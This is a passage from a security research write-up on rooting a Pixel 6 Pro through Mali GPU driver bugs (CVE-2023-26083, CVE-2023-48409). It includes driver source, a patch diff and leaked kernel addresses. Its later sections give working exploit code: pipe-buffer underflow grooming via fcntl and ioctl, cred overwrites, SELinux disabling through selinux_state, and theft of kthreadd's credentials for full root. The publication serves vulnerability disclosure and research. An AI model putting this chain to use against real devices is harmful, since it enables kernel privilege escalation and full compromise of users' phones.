Permissions have been restricted for the interface to acquire a file descriptor for the Timeline Stream. Unless the user process is privileged, now at least one of these conditions must be satisfied[sic]:

The kbase_unprivileged_global_profiling module parameter has been set to 1.

The user process has the CAP_SYS_ADMIN capability.

The user process has the CAP_PERFMON capability.

kbase_unprivileged_global_profiling is a module parameter which of course only privileged processes can modify, but when MALI_STRIP_KBASE_DEVELOPMENT is not defined, it initializes with a default value of 1. This implies the driver has to be explicitly made to disallow unprivileged processes from accessing the stream (by having the flag set during compilation), yet, sure enough, said flag was not mentioned anywhere else in the code.

Of course, this vulnerability was later properly fixed by removing the flag altogether, when the patched driver code from ARM (r43p0) was merged into the codebase, for December 2023 SPL onwards:

@@ -35,19 +35,7 @@
 #include <uapi/linux/eventpoll.h>
 #endif
 
-#ifndef MALI_STRIP_KBASE_DEVELOPMENT
-/* Development builds need to test instrumentation and enable unprivileged
- * processes to acquire timeline streams, in order to avoid complications
- * with configurations across multiple platforms and systems.
- *
- * Release builds, instead, shall deny access to unprivileged processes
- * because there are no use cases where they are allowed to acquire timeline
- * streams, unless they're given special permissions by a privileged process.
- */
-static int kbase_unprivileged_global_profiling = 1;
-#else
 static int kbase_unprivileged_global_profiling;
-#endif
 
 /**
  * kbase_unprivileged_global_profiling_set - set permissions for unprivileged processes

We can quickly verify this:

We can check the module parameter via /sys/module/mali_kbase/parameters/kbase_unprivileged_global_profiling (requires su):

raven:/ # cat /sys/module/mali_kbase/parameters/kbase_unprivileged_global_profiling
1

The KBASE_IOCTL_TLSTREAM_ACQUIRE ioctl command internally calls kbase_timeline_io_acquire. If we do not have the permissions, the function returns -EPERM, otherwise our file descriptor is returned.

Now that we have acquired the stream, the next step is to read from it:

static ssize_t kbasep_timeline_io_read(struct file *filp, char __user *buffer,
				       size_t size, loff_t *f_pos)
{
	ssize_t copy_len = 0;
	struct kbase_timeline *timeline;
	KBASE_DEBUG_ASSERT(filp);
	KBASE_DEBUG_ASSERT(f_pos);
	if (WARN_ON(!filp->private_data))
		return -EFAULT;
	timeline = (struct kbase_timeline *)filp->private_data;
	if (!buffer)
		return -EINVAL;
	if (*f_pos < 0)
		return -EINVAL;
	mutex_lock(&timeline->reader_lock);
	while (copy_len < size) {
		struct kbase_tlstream *stream = NULL;
		unsigned int rb_idx_raw = 0;
		unsigned int wb_idx_raw;
		unsigned int rb_idx;
		size_t rb_size;
		if (kbasep_timeline_copy_headers(timeline, buffer, size,		// [1]
						 &copy_len)) {
			copy_len = -EFAULT;
			break;
		}
		/* If we already read some packets and there is no
		 * packet pending then return back to user.
		 * If we don't have any data yet, wait for packet to be
		 * submitted.
		 */
		if (copy_len > 0) {
			if (!kbasep_timeline_io_packet_pending(
				    timeline, &stream, &rb_idx_raw))
				break;
		} else {
			if (wait_event_interruptible(
				    timeline->event_queue,
				    kbasep_timeline_io_packet_pending(
					    timeline, &stream, &rb_idx_raw))) {
				copy_len = -ERESTARTSYS;
				break;
			}
		}
		if (WARN_ON(!stream)) {
			copy_len = -EFAULT;
			break;
		}
		/* Check if this packet fits into the user buffer.
		 * If so copy its content.
		 */
		rb_idx = rb_idx_raw % PACKET_COUNT;
		rb_size = atomic_read(&stream->buffer[rb_idx].size);
		if (rb_size > size - copy_len)
			break;
		if (copy_to_user(&buffer[copy_len], stream->buffer[rb_idx].data,	// [2]
				 rb_size)) {
			copy_len = -EFAULT;
			break;
		}
		/* If the distance between read buffer index and write
		 * buffer index became more than PACKET_COUNT, then overflow
		 * happened and we need to ignore the last portion of bytes
		 * that we have just sent to user.
		 */
		smp_rmb();
		wb_idx_raw = atomic_read(&stream->wbi);
		if (wb_idx_raw - rb_idx_raw < PACKET_COUNT) {
			copy_len += rb_size;
			atomic_inc(&stream->rbi);
#if MALI_UNIT_TEST
			atomic_add(rb_size, &timeline->bytes_collected);
#endif /* MALI_UNIT_TEST */
		} else {
			const unsigned int new_rb_idx_raw =
				wb_idx_raw - PACKET_COUNT + 1;
			/* Adjust read buffer index to the next valid buffer */
			atomic_set(&stream->rbi, new_rb_idx_raw);
		}
	}
	mutex_unlock(&timeline->reader_lock);
	return copy_len;
}

When we read from the stream, kbasep_timeline_io_read is called, which first dumps all the headers (which is just a “menu” of tracepoint prototypes) before anything ([1]). After skipping through that part, we can read chunk by chunk, making sure each chunk is larger than the buffer size ([2]). Then, following the serialization format, we get a sample output as shown below (fully from an unprivileged context):

raven:/data/local/tmp $ ./leak
[+] Current tgid: 0x1b25
>>> 928 bytes read
[  101.254117] KBASE_TL_NEW_LPU(lpu=0xffffff8010ecf1d0, lpu_nr=0x0, lpu_fn=0x20e)
[  101.254118] KBASE_TL_NEW_LPU(lpu=0xffffff8010ecf1d4, lpu_nr=0x1, lpu_fn=0x1c9e)
[  101.254118] KBASE_TL_NEW_LPU(lpu=0xffffff8010ecf1d8, lpu_nr=0x2, lpu_fn=0x1e)
[  101.254118] KBASE_TL_NEW_AS(address_space=0xffffff8010ece4f0, as_nr=0x0)
[  101.254118] KBASE_TL_NEW_AS(address_space=0xffffff8010ece5a8, as_nr=0x1)
[  101.254119] KBASE_TL_NEW_AS(address_space=0xffffff8010ece660, as_nr=0x2)
[  101.254119] KBASE_TL_NEW_AS(address_space=0xffffff8010ece718, as_nr=0x3)
[  101.254119] KBASE_TL_NEW_AS(address_space=0xffffff8010ece7d0, as_nr=0x4)
[  101.254120] KBASE_TL_NEW_AS(address_space=0xffffff8010ece888, as_nr=0x5)
[  101.254120] KBASE_TL_NEW_AS(address_space=0xffffff8010ece940, as_nr=0x6)
[  101.254120] KBASE_TL_NEW_AS(address_space=0xffffff8010ece9f8, as_nr=0x7)
[  101.254120] KBASE_TL_NEW_GPU(gpu=0xffffff8010ecc000, gpu_id=0x92020010, core_count=0x14)
[  101.254121] KBASE_TL_LIFELINK_LPU_GPU(lpu=0xffffff8010ecf1d0, gpu=0xffffff8010ecc000)
[  101.254121] KBASE_TL_LIFELINK_LPU_GPU(lpu=0xffffff8010ecf1d4, gpu=0xffffff8010ecc000)
[  101.254121] KBASE_TL_LIFELINK_LPU_GPU(lpu=0xffffff8010ecf1d8, gpu=0xffffff8010ecc000)
[  101.254122] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece4f0, gpu=0xffffff8010ecc000)
[  101.254122] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece5a8, gpu=0xffffff8010ecc000)
[  101.254122] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece660, gpu=0xffffff8010ecc000)
[  101.254123] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece718, gpu=0xffffff8010ecc000)
[  101.254123] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece7d0, gpu=0xffffff8010ecc000)
[  101.254123] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece888, gpu=0xffffff8010ecc000)
[  101.254123] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece940, gpu=0xffffff8010ecc000)
[  101.254124] KBASE_TL_LIFELINK_AS_GPU(address_space=0xffffff8010ece9f8, gpu=0xffffff8010ecc000)
[  101.254124] KBASE_TL_NEW_CTX(ctx=0xffffffc01f09d000, ctx_nr=0xf, tgid=0x1b25)
[  101.254125] KBASE_TL_NEW_CTX(ctx=0xffffffc01ee1d000, ctx_nr=0xe, tgid=0xc1e)
[  101.254126] KBASE_TL_NEW_CTX(ctx=0xffffffc01d72d000, ctx_nr=0xd, tgid=0x15b3)
[  101.254127] KBASE_TL_NEW_CTX(ctx=0xffffffc01c585000, ctx_nr=0xc, tgid=0x10af)
[  101.254129] KBASE_TL_NEW_CTX(ctx=0xffffffc01a6fd000, ctx_nr=0xb, tgid=0xe6d)
[  101.254130] KBASE_TL_NEW_CTX(ctx=0xffffffc01924d000, ctx_nr=0xa, tgid=0x98f)
[  101.254132] KBASE_TL_NEW_CTX(ctx=0xffffffc018edd000, ctx_nr=0x8, tgid=0x45f)
[  101.254133] KBASE_TL_NEW_CTX(ctx=0xffffffc016525000, ctx_nr=0x5, tgid=0x806)
[  101.254135] KBASE_TL_NEW_CTX(ctx=0xffffffc015655000, ctx_nr=0x3, tgid=0x3c1)
[  101.254136] KBASE_TL_NEW_CTX(ctx=0xffffffc015801000, ctx_nr=0x2, tgid=0x3dc)
[  101.254137] KBASE_TL_NEW_CTX(ctx=0xffffffc00f9ad000, ctx_nr=0x0, tgid=0x27c)

(The above output is all from a single kbase_create_timeline_objects invocation, when the stream is first established.)

This also shows that the vulnerability itself does indeed exist on the device, so why couldn’t we use it directly in the original exploit?

Command Stream Frontend

3rd generation Valhall GPUs saw the introduction of the Command Stream Frontend (CSF) as a replacement for its former Job Manager (JM) model, to better adapt to the demands of modern APIs like Vulkan. The gist of it is, as the name suggests, GPU jobs are now submitted via a command stream, which makes it easier to craft and send updates on a more granular and flexible level, consequently bringing down CPU usage. On the kernel driver side, since the way it interfaces with the GPU has been effectively overhauled, this change manifests as a whole different set of APIs exposed to the userspace.

Pixel 6 Pro, our target device, utilizes Mali-G78, a 2nd generation Valhall GPU, which lacks support for CSF, unlike later devices like Pixel 7/8. Interestingly, Google more or less maintains a single codebase for its Mali implementation (of course with device-specific patches in different branches); the difference in functionality is handled entirely via a single config: MALI_USE_CSF. For example, in kbase_ioctl:

#if !MALI_USE_CSF
	case KBASE_IOCTL_POST_TERM:
		KBASE_HANDLE_IOCTL(KBASE_IOCTL_POST_TERM,
				kbase_api_post_term,
				kctx);
		break;
#endif /* !MALI_USE_CSF */
	case KBASE_IOCTL_MEM_ALLOC:
		KBASE_HANDLE_IOCTL_INOUT(KBASE_IOCTL_MEM_ALLOC,
				kbase_api_mem_alloc,
				union kbase_ioctl_mem_alloc,
				kctx);
		break;
#if MALI_USE_CSF
	case KBASE_IOCTL_MEM_ALLOC_EX:
		KBASE_HANDLE_IOCTL_INOUT(KBASE_IOCTL_MEM_ALLOC_EX, kbase_api_mem_alloc_ex,
					 union kbase_ioctl_mem_alloc_ex, kctx);
		break;
#endif
	case KBASE_IOCTL_MEM_QUERY:
		KBASE_HANDLE_IOCTL_INOUT(KBASE_IOCTL_MEM_QUERY,
				kbase_api_mem_query,
				union kbase_ioctl_mem_query,
				kctx);
		break;

Knowing this, going back to the timeline acquisition:

int kbase_timeline_io_acquire(struct kbase_device *kbdev, u32 flags)
{
	/* The timeline stream file operations structure. */
	static const struct file_operations kbasep_tlstream_fops = {
		.owner = THIS_MODULE,
		.release = kbasep_timeline_io_release,
		.read = kbasep_timeline_io_read,
		.poll = kbasep_timeline_io_poll,
		.fsync = kbasep_timeline_io_fsync,
	};
	int err;
	if (!timeline_is_permitted())
		return -EPERM;
	if (WARN_ON(!kbdev) || (flags & ~BASE_TLSTREAM_FLAGS_MASK))
		return -EINVAL;
	err = kbase_timeline_acquire(kbdev, flags);
	if (err)
		return err;
	err = anon_inode_getfd("[mali_tlstream]", &kbasep_tlstream_fops, kbdev->timeline,
			       O_RDONLY | O_CLOEXEC);
	if (err < 0)
		kbase_timeline_release(kbdev->timeline);
	return err;
}

One of the checks ensure that only supported flags can be set in the ioctl call, otherwise -EINVAL is returned. What are the supported flags? Well, BASE_TLSTREAM_FLAGS_MASK is defined in one of two locations, depending on CSF support:

common/include/uapi/gpu/arm/midgard/jm/mali_base_jm_kernel.h:

/* Flags for base tracepoint specific to JM */
#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
		BASE_TLSTREAM_JOB_DUMPING_ENABLED)

(which are 1<<0 and 1<<1 respectively.)

common/include/uapi/gpu/arm/midgard/csf/mali_base_csf_kernel.h:

/* Flags for base tracepoint specific to CSF */

/* Enable KBase tracepoints for CSF builds */
#define BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS (1 << 2)

/* Enable additional CSF Firmware side tracepoints */
#define BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS (1 << 3)

#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
		BASE_TLSTREAM_JOB_DUMPING_ENABLED | \
		BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS | \
		BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS)

This means that as long as the CSF-specific flags are not set in our ioctl call, we can acquire a file descriptor just fine.

Hence, the actual issue here is not regarding tlstream itself, but instead simply that kbase_kcpu_command_queue, a CSF feature, is not available on our target device, and we will have to hunt for a different object to leak its address.

The Golden Object: `kbase_context`

After a quick session of digging around in the source code, I found a different low-hanging fruit: kbase_context gets its address leaked immediately from context creation, and it contains a task_struct pointer, directly pointing to our current task!

For context, kbase_context, as the name implies, can be thought as representing the session information for the duration a process interfaces with the driver, for example when allocating pages. As this then implies, there must already have been a corresponding kbase_context pretty early on. Indeed, kbase_context (kctx) is created after we perform a basic setup on a file descriptor that we have open-ed (which makes sense for a “context” to be established):

KBASE_IOCTL_VERSION_CHECK (ioctl)
kbase_ioctl
    -> kbase_api_handshake
        -> kbase_file_set_api_version
            -> atomic_set(&kfile->setup_state, KBASE_FILE_NEED_CTX);

KBASE_IOCTL_SET_FLAGS (ioctl)
kbase_ioctl
    -> kbase_api_set_flags
        -> kbase_file_create_kctx [requires KBASE_FILE_NEED_CTX]
            -> kbase_create_context
                -> kctx = vzalloc(sizeof(*kctx));
            -> atomic_set(&kfile->setup_state, KBASE_FILE_COMPLETE);

Unsurprisingly, we need to have completed the setup in order to trigger either vulnerability in the first place:

static long kbase_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	struct kbase_file *const kfile = filp->private_data;
	struct kbase_context *kctx = NULL;
	struct kbase_device *kbdev = kfile->kbdev;
	void __user *uarg = (void __user *)arg;

	/* Only these ioctls are available until setup is complete */
	switch (cmd) {
...
	}

	kctx = kbase_file_get_kctx_if_setup_complete(kfile);
	if (unlikely(!kctx))
		return -EPERM;

	/* Normal ioctls */
	switch (cmd) {
...
	case KBASE_IOCTL_TLSTREAM_ACQUIRE:
		KBASE_HANDLE_IOCTL_IN(KBASE_IOCTL_TLSTREAM_ACQUIRE,
				kbase_api_tlstream_acquire,
				struct kbase_ioctl_tlstream_acquire,
				kctx);
		break;
...
	case KBASE_IOCTL_BUFFER_LIVENESS_UPDATE:
		KBASE_HANDLE_IOCTL_IN(KBASE_IOCTL_BUFFER_LIVENESS_UPDATE,
				kbase_api_buffer_liveness_update,
				struct kbase_ioctl_buffer_liveness_update,
				kctx);
		break;
	}

	dev_warn(kbdev->dev, "Unknown ioctl 0x%x nr:%d", cmd, _IOC_NR(cmd));

	return -ENOIOCTLCMD;
}

Now, combined with our preexisting read/write primitive (via underflowing a pipe_buffer), we don’t even have to find an address to place a puppet pipe_buffer object – we can chain just a small amount of underflows to hijack cred directly:

uint64_t kctx, cur_task, cur_cred;
kctx = leak_from_tlstream(stream_fd, getpid());
aar(kctx+TASK_OFFSET, &cur_task, sizeof(cur_task));
aar(cur_task+CRED_OFFSET, &cur_cred, sizeof(cur_cred));
char buf[0x20] = {0};
aaw(cur_cred, buf, sizeof(buf));

To chain the underflows, we can abuse the LIFO nature of the page allocator freelist. First, we allocate a dummy pipe where we want the malicious object to go in preparation. Then, when we want to trigger an underflow write, we resize the pipe such that it frees its order-2 block, allowing us to allocate the malicious object where the pipe originally was. And since the object is freed immediately after, we simply resize the pipe back to take up the newly freed block to hold onto it for future use.

fcntl(dummy_pipe_fd[1], F_SETPIPE_SZ, 0x10*0x1000); // free the order-2 block
ioctl(gpu_fd, KBASE_IOCTL_BUFFER_LIVENESS_UPDATE, &payload);
fcntl(dummy_pipe_fd[1], F_SETPIPE_SZ, 0x100*0x1000); // alloc back the order-2 block

This does make it less reliable since we have more points of failure (one bad underflow and the kernel crashes from CONFIG_HARDENED_USERCOPY), but in practice based on testing, it does not happen very often.

Cleaning Up: Making the Exploit Practical

As mentioned previously, on Android, clearing the uid/gid alone is not enough to obtain full privileges. Here are some more things to consider:

We don’t have all capabilities yet. This is not an issue, we just extend our write past the uid/gid fields to write overselves full capabilities.
SELinux is not yet disabled – manually overriding it (setenforce 0) doesn’t work either since we don’t have the proper sid. Changing the sid is another read+write away (((struct task_security_struct *)cred->security)->sid).
The process sandbox is still in effect, preventing syscalls like init_module. Disabling the sandbox is another write away (current->thread_info.flags).
Exiting the process crashes the kernel because our pipe_buffer.ops field is still invalid.

As an alternative, we could also choose to replace the whole cred altogether:

Leak any kernel text pointer via our task_struct (e.g. restart_block.fn). We also get to revert the pipe_buffer.ops field to its original value this way.
Disable SELinux via selinux_state.
Obtain a privileged cred pointer via kthreadd_task.
Overwrite our current task_struct’s cred pointer to the above.

uint64_t kctx, cur_task, restart_block_fn, kthreadd_task, kthreadd_task_cred;
kctx = leak_from_tlstream(stream_fd, getpid());
aar(kctx+TASK_OFFSET, &cur_task, sizeof(cur_task));
aar(cur_task+RESTART_OFFSET, &restart_block_fn, sizeof(cur_task));
uint64_t kernel_base = restart_block_fn-RESTART_KERN_OFF;
pipe_ptr->ops = (const void *)(kernel_base+PIPE_OPS_KERN_OFF);
char selinux_write = 0;
aaw(kernel_base+SELINUX_STATE_KERN_OFF, &selinux_write, sizeof(selinux_write));
aar(kernel_base+KTHREADD_TASK_KERN_OFF, &kthreadd_task, sizeof(kthreadd_task));
aar(kthreadd_task+CRED_OFFSET, &kthreadd_task_cred, sizeof(kthreadd_task_cred));
uint64_t cred_write[2] = { kthreadd_task_cred, kthreadd_task_cred };
aaw(cur_task+CRED_OFFSET-sizeof(cred_write[0]), cred_write, sizeof(cred_write));

Conclusion

This research successfully demonstrated that Pixel 6 Pro could be exploited using a single vulnerability, challenging the conventional wisdom that both CVE-2023-48409 and CVE-2023-26083 were required.

Android really has its interesting share of quirks that both (mostly) strengthen and (some perhaps unintentionally) weaken its defenses, as compared to plain old Linux, as demonstrated in the exploit processes above.

As for the two vulnerabilities analyzed, this post hopefully highlights how simple weaknesses can still be readily found in complex kernel drivers, sometimes without too much setup required even, as well as the damage they can cause. I was particularly impressed by the second vulnerability (originally meant to be just a footnote), seeing how a flexible “tech” can play different roles according to what is available and what is required for the exploit.

Closing off, I would like to thank my mentor, Peter, for his patient support and tons of spot-on advice, as well as everyone at STAR Labs, for the amazing internship experience and opportunity!

Table of Contents#

Root Cause Analysis#

CVE-2023-48409#

What is CONFIG_HARDENED_USERCOPY?#

The Missing Piece: CVE-2023-26083#

One Bug to Root#

Physmap Spraying#

Pagetable Spraying#

From Physical to Virtual: Converting Our Primitive#

Android’s Unique Challenges#

Bypassing Android’s App Sandbox#

Disabling SELinux Enforcement#

A Surprise Discovery#

Understanding the Timeline Stream Leak#

Command Stream Frontend#

The Golden Object: kbase_context#

Cleaning Up: Making the Exploit Practical#

Conclusion#

References#

Table of Contents